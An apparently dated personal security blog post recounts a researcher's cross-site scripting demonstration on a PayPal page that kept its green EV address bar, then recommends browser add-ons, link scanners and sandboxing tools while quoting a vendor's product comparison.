PayPal Alert!
A Finnish security researcher has shown how to mess with a supposedly 'secure' PayPal web page while the address bar still leads visitors to believe they're safe.
Are you aware of the security protections many web sites use to [help] indicate to users (via their browser) things like the fact that the connection is 'encrypted', and that the site has been 'verified/validated'* by one of the [many] certificate authorities (like Verisign**) ? If you are that's good. You're ahead of the folks who pay no attention at all, and it shows that you're making an effort to keep security in mind. Unfortunately that's not nearly good enough.
Do you think that you're "safe" when you see your address bar turn green indicating that the site is using the EV 'Extended Validation' SSL Certificate security mechanism? Read this article about how "...Finnish researcher Harry Sintonen figured out a way to inject his own code into a supposedly protected PayPal page even as the green bar lulled visitors into believing it hadn't been tampered with. Sintonen's code simply caused an Internet Explorer alert window to open with the words "Is it safe?...".
Below a screenshot showing what Sintonen did, the author explains it like this: "During an online interview, he demonstrated a page that prompted users for their account credentials and then sent them to an unauthorized server, and he said it would be possible for him to steal user cookies as well. All the while, the address bar would bear the PayPal URL in green. At time of publication, eBay had not yet removed the buggy code."
Further down the author [rightly] points out another 'indicator' that gives web site visitors a false sense of security: "Despite the proliferation of XSS attacks, McAfee's ScanAlert, which provides daily audits of ecommerce websites to certify them "Hacker Safe," gives clients the thumbs up even when XSS vulnerabilities are discovered on their pages. ®".
I have to say that if you have been reading my posts, and followed my advice urging you to use the Firefox browser combined with the "NoScript" add-on, you'd be protected against this and many, many other scripting and XSS (cross-site-scripting) attacks, and more.
I can't tell you how often I've read about some new exploit being discovered, and realized that it doesn't affect me thanks to NoScript. I don't care if I sound like a salesman for Firefox and NoScript.. First of all they're FREE, and second, they're what I personally use (90% of the time***) because I believe the combination provides an excellent foundation for safe browsing. Also Giorgio Maone is brilliant and stays on top of the latest threats, updating NoScript regularly. One of the top security organizations in the world (SANS) has mentioned NoScript numerous times including here.
In addition to those two, other required elements for web-surfing security (that I've mentioned many times) are 'real-time' scanners that examine the content/actions of a web page and/or search results (and not just attempt to match 'signatures' of known malware), preventing your browser from accessing them if anything malicious is detected. So far I believe LinkScanner Pro is the best product in this category because it goes beyond protecting your web browsing sessions. It also protects your system/network full-time. It's not free, but it's not expensive either (about twenty bucks), and it's one of the [very] few pieces of software I'd gladly pay for! There's also a free 'Lite' version available that doesn't have the full system protection but still offers protection while you browse. I really like the ability to R-click on any link and have LinkScanner scan it with "Quick Scan" before I [Left] click on it for real.
Here are some clips from this Exploit Prevention Labs page explaining some of the important differences between LinkScanner's (and to some extent Finjan's SecureBrowsing) and McAfee's "SiteAdvisor":
"LinkScanner and SiteAdvisor are both intended to provide information about website safety. However, that is where the comparison ends. We believe that SiteAdvisor, while clearly a quality product, was conceived in the relatively static world of Web 1.0, a very different place from the highly dynamic Web 2.0 for which LinkScanner has been designed."
"LinkScanner’s SearchShield technology actually does a live scan on Google, Yahoo and MSN search results and with no delay in search engine results delivery. This enables LinkScanner to definitively state whether the page behind any link is or is not safe at the only time that matters – the time you plan to visit it. Similarly, LinkScanner’s QuickScan technology scans any link on-demand with a simple right mouse-click.
In contrast, SiteAdvisor "crawls" entire sites over a period of weeks and/or months and renders opinions about entire sites, which are then stored in a central database. When you perform a search, SiteAdvisor simply reaches back to its database and delivers an opinion based on the status of the site the last time it was crawled. Because the Internet is so large and crawling is time-intensive, it might be many months before SiteAdvisor revisits a site to check its safety. It may also take weeks or even months for SiteAdvisor to scan the entire site before it can offer an opinion on its safety – assuming it has ever visited the site at all. A delay of any length of time in today's Web 2.0 world can easily mean the difference between a clean bill of health and an infection for that site you’re about to click through to."
- I used McAfee's SiteAdvisor (and also Netcraft) before I discovered Finjan and subsequently LinkScanner/Pro. Many times SiteAdvisor told me a site had either not been scanned yet, identified some of my favorite sites as 'questionable', or was 'in the process of checking' out the site. It just got so that I couldn't trust the results.
"With LinkScanner, if you click on a link that goes to a bad page, we look ahead at that page and, if it's safe, you can continue your surfing without delay. If it is bad when you’re about to click on it, we block access to that page to prevent it from infecting your system. We do this page by page, not site by site or domain by domain.
When SiteAdvisor renders an opinion, it is an opinion on the entire site, not just the page you are visiting. Why is this important? A few weeks ago, an exploit infected thousands of MySpace.com pages in a matter of hours. SiteAdvisor would (if they had scanned any of those thousands of pages that day) have had to make a decision to either label ALL of MySpace.com bad because of those bad pages, blocking you from visiting any of the thousands of safe pages on that domain, or label all of MySpace.com safe, putting you at risk if you visited any of the bad pages."
- Common sense dictates which of these products provides the better protection. No product can protect you 100% of the time from everything. All you can do is go with the best product(s) you can find, don't rely on one [single] product to do everything, and be as smart as you can.
There's also Finjan's SecureBrowsing add-on. Finjan is an excellent company also. They mainly sell security 'hardware' for businesses. I believe SecureBrowsing and LinkScanner work with both Firefox and Internet Explorer (although I have to advise people to limit their use of IE to 'only when necessary').
There are also other methods of protection for browsers like 'Sandboxing'. One of the best known products is SandboxIE. Another is/was GreenBorder Technologies which was acquired by Google, and recently "ZoneAlarm ForceField" was released in 'beta' form by Check Point Software Technologies and is now finished and available.
It's interesting that ZoneAlarm ForceField promotional material almost makes it sound like they just invented sandbox technology, when it's actually been around and used for quite a long time.
ZoneAlarm ForceField is not free. Sandboxie is "However, if you use Sandboxie for more than 30 days, the software will occasionally remind you to consider paying the registration fee.". If purchased/registered they'll both run you about $30, although Sandboxie gives you "...a life-time registration key to this and all upcoming versions... You also get to use a few of the features of Sandboxie that are reserved for paying users.".
Note: I haven't used either (yet), so I can't advise you as to their effectiveness. I plan to keep an eye on the new ZoneAlarm product and see what kind of reviews it gets, and at some point give it a try myself.
And one last thought I wanted to mention. Many of the firewalls, anti-virus/malware, and combination 'suites' incorporate various web protection technologies also. Their effectiveness and abilities vary, so you should rely on independant testing and real-world results (and the anecdotal evidence that generates in the relevant User Forums).
As with most things, the more you know, the better you'll be able to judge what works best for you. Certain security products work well together, others don't. Over time you should find what works best for you and your system. But don't be afraid to try out new software, and give it a chance!
[But], if you run into issues, make certain that they're not being caused by quirks in your system or something you've done (or failed to do, like reading the instructions/help section). I see it frequently in forums and software comments sections where someone will say how terrible a product is, all the while knowing from my own experience that the product is fine and it's the user and/or their system that's screwed up!
And keep in mind that no product is perfect. That's why knowledgeable people suggest and use a 'layered' defense so that what one can't (or isn't designed to) catch, another should. It's an ongoing process of software/hardware evolution, both for the criminal hackers/crackers and their counterparts working to protect the end users.
- Until next time, remember that one of the most important security tools you have is your brain, so always remember to THINK before you click!
* Almost anyone can get a certificate for their web site, including the SSL type if they want to pay the fee.
** VeriSign is one of the reputable companies, but there are many others without the reputation of VeriSign. And as you see just because a web site is totally legitimate and has been 'certified', even if it's using a SSL (https://) connection for the web page (or the whole site) and an 'extended' validation certificate, it's STILL vulnerable to hacking/exploits!
*** I have to use IE at times, and I also like the Opera browser and it's innovative features. If NoScript worked with Opera I'd probably use it a lot more.
